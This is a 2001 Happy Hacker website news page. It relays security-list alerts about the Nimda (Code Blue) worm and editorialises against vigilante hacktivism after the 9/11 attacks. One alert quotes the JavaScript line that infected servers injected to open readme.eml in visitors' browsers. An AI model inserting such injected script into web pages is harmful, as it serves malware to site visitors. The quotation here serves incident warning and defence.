What's New!

Chat with

How to Defend
Your Computer 

The Guides
to (mostly) 
Harmless Hacking

Happy Hacker 
Digests (old stuff) 

Hacker Links 


Meet the 
Happy Hacksters 

Help for 



It Sucks 
to Be Me!

How to Commit
Computer Crime (not)! 

What Is a 
Hacker, Anyhow? 

Have a 
Great Life! 

News from the 
Hacker War Front

War in Cyberspace

New Internet worm on loose. US Attorney General John Ashcroft held a press conference 9/18/01 to announce the most dangerous Internet worm yet, dubbed variously Code Blue and Nimda. It attacks through an email attachment (the attachment is "readme.exe"), by infecting Explorer browsers, propagating through netbios shares, and by directly attacking web servers. More on this story --->>

From: <Larry.Leibrock@bus.utexas.edu>


We and many other Internet sites are presently experiencing two types of attacks:

1. Infected email The subject line on email sent to you is variable. The attachment is "readme.exe" and has a MIME type of "Content-Type: audio/x-wav;". This virus is "network aware", which means it spread through open, unpassworded NetBIOS shares. This is called the W32/Nimda.a@mm

2. A browser based attack that seeks to infect the targets web server. This attack is now termed Code Blue.

From: Davis, Matt [mailto:matt.davis@countryfinancial.com]
Sent: Tuesday, September 18, 2001 11:44 AM
To: Davis, Matt
Cc: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM; incidents@securityfocus.com; unisog@sans.org
Subject: Some more details on the worm

When pages are served up by an infected server, it looks as though readme.eml is 'attached' to them. The server attempts to get the client to open them through the following bit of code (from the .dll file):

<script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script>

According to Slashdot, this causes the file to be automatically opened and executed by the client. I haven't been able to confirm or deny that (but if someone can, please do).


Matt Davis, MCP
Intermediate Client Server Business Support Analyst
COUNTRY(SM) Insurance & Financial Services

How your web browser can get infected by Nimda. From: Russ <Russ.Cooper@RC.ON.CA>
Subject: Alert: Check your IIS boxes now!


Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the

Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).

While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.

Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

Is hacktivism the answer? In the aftermath of the terrorist attacks of Sept. 11, some hackers are trying to organize strikes against Middle Eastern nations. This is a very bad idea. Almost all Middle Eastern nations hate terrorist leader Osama bin Laden and are our allies in bringing him to justice. The only government on the side of the terrorists is Afghanistan. Most of the people of Afghanistan also hate bin Laden and their Taliban oppressors. We need to leave Afghanistan's Internet access up so US cyberwarfare experts can use them for their own rather, ahem, interesting uses.

NIPC (US National Infrastructure Protection Center) has "already received reports of individuals encouraging vigilante hacking activity. Those individuals who believe they are doing a service to this nation by engaging in acts of vigilantism should know that they are actually doing a disservice to the country," their advisory stated. See "It sucks to be me" for details on how these hacktivists are actually harming the war against terrorism.

Us folks at Happy hacker wish to thank those hackers who have helped quiet down over-eager volunteers. Responding to the attacks on America is an extremely delicate operation. If you want to play a role in defending us in time of cyberwar, here are some concrete steps you can take.

First, President Bush will let you know if he needs hacker vigilantes to help. Right now he does NOT WANT VIGILANTE HELP. He probably NEVER will want vigilante help. The kind of baloney that went on with the US/China hacker war of April-May 2001 was an unfortunate holdover from Clinton Administration policies. The Oct. issue of Scientific American carries Carolyn Meinel's analysis of this unfortunate fubar of foreign policy.

Carolyn's most
popular book,
in 4th edition now!
For advanced
hacker studies,
read Carolyn's
Google Groups
Subscribe to Happy Hacker
Visit this group

 © 2013 Happy Hacker All rights reserved.